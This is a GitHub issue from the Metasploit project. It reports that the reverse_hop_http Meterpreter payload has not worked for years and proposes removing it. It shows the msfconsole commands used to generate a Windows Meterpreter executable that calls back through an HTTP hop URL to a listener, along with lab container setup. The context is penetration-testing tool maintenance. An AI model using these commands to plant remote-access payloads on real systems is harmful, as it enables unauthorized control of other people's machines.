Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

reverse_hop_http does not work #19691

Open
smcintyre-r7 opened this issue Dec 4, 2024 · 0 comments
Open

reverse_hop_http does not work #19691

smcintyre-r7 opened this issue Dec 4, 2024 · 0 comments
Assignees
Labels

Comments

@smcintyre-r7
Copy link
Contributor

smcintyre-r7 commented Dec 4, 2024

The reverse_hop_http payload does not work now and it hasn't worked since 4ac7c5e. I was able to bisect the diff between where it was added in 4ac7c5e and when it stopped working. Since it worked for less than 3 months over 8 years ago and there are currently no issues noting that it's not working, I think we should simply remove it. This came up while I was testing the changes in #19609.

Testing Setup

I used this RC file to run the commands to generate the payload and start the handler. The HOPURL pointed to an apache LAMP docker container.

use payload/windows/meterpreter/reverse_hop_http
set HOPURL http://192.168.159.135/hop.php
generate -t exe -f meterpreter_hop.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_hop_http
set HOPURL http://192.168.159.135/hop.php
exploit

I started the LAMP server with docker run --rm -d -p 80:80 --name my-apache-php-app -v "$PWD":/var/www/html php:5.6.40-apache

To run this old of a Metasploit version, I checked out the commit with git then used another container started with: podman run --rm -v $(pwd):/root/msf -ti ruby:2.1.7 /bin/bash.

In that container I had to fix the sources to install the necessary dependencies:

cat <<EOF > /etc/apt/sources.list
deb http://archive.debian.org/debian jessie main
deb-src http://archive.debian.org/debian jessie main
deb http://archive.debian.org/debian-security jessie/updates main
deb-src http://archive.debian.org/debian-security jessie/updates main
EOF
apt-get update -o Acquire::Check-Valid-Until=false
apt-get install -y libpcap0.8-dev --force-yes

After that I could bundle install and bundle exec the old version of Metasploit for testing.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
Status: Todo
Development

No branches or pull requests

2 participants